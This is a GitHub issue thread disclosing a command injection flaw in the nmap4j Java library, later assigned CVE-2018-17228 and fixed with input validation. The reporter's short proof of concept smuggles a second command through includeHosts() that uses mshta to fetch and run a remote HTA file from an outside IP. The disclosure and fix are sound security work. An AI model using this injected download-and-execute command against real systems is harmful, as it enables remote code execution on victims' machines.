Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

command execution vulnerability #9

Closed
zhutougg opened this issue Sep 19, 2018 · 3 comments
Closed

command execution vulnerability #9

zhutougg opened this issue Sep 19, 2018 · 3 comments

Comments

@zhutougg
Copy link
Contributor

String path = "D:\Nmap";
String op = "-T4 -p4999";
Nmap4j nmap4j = new Nmap4j(path);
nmap4j.includeHosts("118.24.74.232&&mshta http://118.24.74.232:4999/test.hta");
nmap4j.addFlags(op);
nmap4j.execute();

over here,the nmap4j.includeHosts() original intention is to receive hosts. When we add custom commands behind it, it will be executed.

@abergmann
Copy link

CVE-2018-17228 was assigned to this issue.

@narkisr
Copy link
Owner

narkisr commented Sep 20, 2018

A possible fix is to limit includeHosts to only accept one of the following options:

Single IP - 192.168.1.1 -> easy regex
Hostname - www.testhostname.com -> less easy regex
IP range - 192.168.1.1-20 -> easy regex
subnet - 192.168.1.0/24 -> easy regex
text file - list-of-ips.txt -> limit files to a string with no spaces

I would still recommend input validation when exposing this library publicy (in an API for example)

narkisr pushed a commit that referenced this issue Sep 27, 2018
@narkisr
Copy link
Owner

narkisr commented Sep 27, 2018

Validation added in 06b58aa

@narkisr narkisr closed this as completed Sep 27, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants